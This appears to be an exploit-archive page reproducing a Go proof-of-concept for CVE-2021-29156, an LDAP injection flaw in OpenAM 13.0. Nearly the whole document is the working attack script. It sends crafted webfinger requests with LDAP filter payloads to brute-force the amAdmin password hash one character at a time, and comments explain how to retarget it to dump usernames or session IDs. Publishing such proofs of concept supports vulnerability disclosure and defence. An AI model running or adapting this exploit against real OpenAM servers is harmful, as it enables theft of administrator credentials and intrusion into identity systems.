扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 |
# Exploit Title: OpenAM 13.0 - LDAP Injection # Date: 03/11/2021 # Exploit Author: Charlton Trezevant, GuidePoint Security # Vendor Homepage: https://www.forgerock.com/ # Software Link: https://github.com/OpenIdentityPlatform/OpenAM/releases/tag/13.0.0, # https://backstage.forgerock.com/docs/openam/13/install-guide/index.html#deploy-openam # Version: OpenAM v13.0.0 # Tested on: go1.17.2 darwin/amd64 # CVE: CVE-2021-29156 # # This vulnerability allows an attacker to extract a variety of information # (such as a user’s password hash) from vulnerable OpenAM servers via LDAP # injection, using a character-by-character brute force attack. # # https://github.com/guidepointsecurity/CVE-2021-29156 # https://nvd.nist.gov/vuln/detail/CVE-2021-29156 # https://portswigger.net/research/hidden-oauth-attack-vectors package main // All of these dependencies are included in the standard library. import ( "container/ring" "fmt" "math/rand" "net/http" "net/url" "sync" "time" ) func main() { // Base URL of the target OpenAM instance baseURL := "http://localhost/openam/" // Local proxy (such as Burp) proxy := "http://localhost:8080/" // Username whose hash should be dumped user := "amAdmin" // Configurable ratelimit // This script can go very, very fast. But it's likely that would overload Burp and the target server. // The default ratelimit of 6 can retrieve a 60 character hash through a proxy in about 5 minutes and // ~1700 requests. rateLimit := 6 // Beginning of the LDAP injection payload. %s denotes the position of the username. payloadUsername := fmt.Sprintf(".well-known/webfinger?resource=http://x/%s)", user) partURL := fmt.Sprintf("%s%s", baseURL, payloadUsername) // Your LDAP injection payloads. %s denotes the position at which the constructed hash + next test character // will be inserted. // These are configured to dump password hashes. But you can reconfigure them to dump other data, such as // usernames/session IDs/etc depending on your use case. // N.B. you will likely need to update the brute-forcing keyspace depending on the data you're trying to dump. testCharPayload := "(sunKeyValue=userPassword=%s*)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer" testCrackedPayload := "(sunKeyValue=userPassword=%s)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer" // The keyspace for brute-forcing individual characters is stored in a ringbuffer // You may need to change how this is initialized depending on the types of data you're // trying to retrieve. By default, this is configured for password hashes. dict := makeRing() // Working characters for each step are concatenated with this string. Further tests are conducted // using this value as it's built. // Importantly, if you already have part of the hash you can put it here as a crib. This allows you // to resume a previous brute-forcing session. password := "" proxyURL, _ := url.Parse(proxy) // You can modify the HTTP client configuration below. // For example, to disable the HTTP proxy or set a different // request timeout value. client := &http.Client{ Transport: &http.Transport{ Proxy: http.ProxyURL(proxyURL), }, Timeout: 30 * time.Second, } // Channels used for internal signaling cracked := make(chan string, 1) foundChar := make(chan string, 1) wg := &sync.WaitGroup{} wg.Add(1) // All hacking tools need a header. You may experience a 10-15x performance improvement // if you replace the flower-covered header with the gothic bleeding/flaming/skull-covered // ASCII art typical of these kinds of tools. printHeader() loop: for { select { case <-cracked: // Full hash test succeeds, terminate everything // N.B. this feature does not work, see my comments on checkCracked. fmt.Printf("Cracked! Password hash is: \"%s\"\n", password) wg.Done() break loop case char := <-foundChar: // In the event that a test character succeeds, that thread will pass it along in the // foundChar channel to signal success. It's then concatenated with the known-good // password hash and the whole thing is tested in a query // This doesn't work because OpenAM doesn't respond to direct queries containing the password hash // in the manner I expect. But it might still work for other types of data. password += char fmt.Printf("Progress so far: '%s'\n", password) // Forgive these very ugly closures go (func(client *http.Client, url, payload *string, password string, cracked *chan string) { // Add random jitter before submitting request time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond) time.Sleep(1 * time.Second) checkCracked(client, url, payload, &password, cracked) })(client, &partURL, &testCharPayload, password, &cracked) default: for i := 0; i < rateLimit-1; i++ { testChar := dict.Value.(string) go (func(client *http.Client, url, payload *string, password, testChar string, foundChar *chan string) { time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond) time.Sleep(1 * time.Second) getChar(client, url, payload, &password, &testChar, foundChar) })(client, &partURL, &testCrackedPayload, password, testChar, &foundChar) dict = dict.Next() } time.Sleep(1 * time.Second) } } wg.Wait() } // checkCracked tests a complete string in a query against the OpenAM server to // determine whether the exact, full hash has been retrieved. // This doesn't actually work, because the server doesn't respond as I'd expect // A better implementation would probably watch until all positions in the ringbuffer // are exhausted in testing and terminate (since there's no way to progress further) func checkCracked(client *http.Client, targetURL, payload, password *string, cracked *chan string) { fullPayload := fmt.Sprintf(*payload, url.QueryEscape(*password)) fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload) req, err := http.NewRequest("GET", fullURL, nil) if err != nil { fmt.Printf("checkCracked: %s", err.Error()) return } res, err := client.Do(req) if err != nil { fmt.Printf("checkCracked: %s", err.Error()) return } if res.StatusCode == 200 { *cracked <- *password return } if res.StatusCode == 404 { return } fmt.Printf("checkCracked: got status code of %d for payload %s", res.StatusCode, payload) } // getChar tests a given character at the end position of the configured payload and dumped hash progress. func getChar(client *http.Client, targetURL, payload, password, testChar *string, foundChar *chan string) { // Concatenate test character -> password -> payload -> attack URL combinedPass := url.QueryEscape(fmt.Sprintf("%s%s", *password, *testChar)) fullPayload := fmt.Sprintf(*payload, combinedPass) fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload) req, err := http.NewRequest("GET", fullURL, nil) if err != nil { fmt.Printf("getChar: %s", err.Error()) return } res, err := client.Do(req) if err != nil { fmt.Printf("getChar: %s", err.Error()) return } if res.StatusCode == 200 { *foundChar <- *testChar return } if res.StatusCode == 404 { return } fmt.Printf("getChar: got status code of %d for payload %s", res.StatusCode, payload) } // makeRing instantiates a ringbuffer and initializes it with test characters common in base64 // and password hash encodings. // Bruteforcing on a character-by-character basis can only go as far as your dictionary will take // you, so be sure to update these strings if the keyspace for your use case is different. func makeRing() *ring.Ring { var upcase string = <code>ABCDEFGHIJKLMNOPQRSTUVWXYZ var lcase string = <code>abcdefghijklmnopqrstuvwxyz var num string = <code>1234567890 var punct string = <code>$+/.= var dictionary string = upcase + lcase + num + punct buf := ring.New(len(dictionary)) for _, c := range dictionary { buf.Value = fmt.Sprintf("%c", c) buf = buf.Next() } return buf } // printHeader is cool. func printHeader() { fmt.Printf(<code> _______,---.,---. .-''-. / __\ | /| | .'_ _ \ | ,_/\__)|| |.'/ ( ' ) ' ,-./)|| _ ||. (_ o _)| \'_ '')|_( )_||(_,_)___| > (_))__\ (_ o._) /'\ .---. (..-'_/)\ (_,_) /\'-'/ '-''-' /\ /\ / '._____.''---'''-..-' .'''''-. .-'''''''-. .'''''-. ,---. .'''''-..-''''-.,---. ,--------..------..---. / ,-.\ / ,'''''''. \ / ,-.\ /_ |/ ,-.\/_ _ \/_ | | _____| /.-. \ \ / (___/| ||/ .-./ )\|(___/| |,_ | (___/| ||( ' )|,_ | |)// '--' | | .'/ || \ '_ .')||.'/ ,-./)| _ __ _.'/ | (_{;}_) |,-./)| |'----. |.----.\ / _.-'_.-'||(_ (_) _)||_.-'_.-'\'_ '') ( ' )--( ' ) _.-'_.-'|(_,_)|\'_ '')|_.._ _'. | _ _'. v _/_.' ||/ .\ ||_/_.'> (_))(_{;}_)(_{;}_)_/_.'\| > (_)) ( ' ) \|( ' ) \ _ _ ( ' )(__..--.||'-''"' || ( ' )(__..--.(..-' (_,_)--(_,_)( ' )(__..--.'----'|(..-' _(_{;}_)|| (_{;}_)|(_I_) (_{;}_)|\'._______.'/(_{;}_)| '-''-'| (_{;}_)|.--. // '-''-'| |(_,_)/ \(_,_)/(_(=)_) (_,_)-------' '._______.'(_,_)-------' '---'(_,_)-------')_____.''---''...__..' '...__..'(_I_) ~ ~ (c) 2021 GuidePoint Security - charlton.trezevant@guidepointsecurity.com ~ ~ </code>) } |
体验盒子
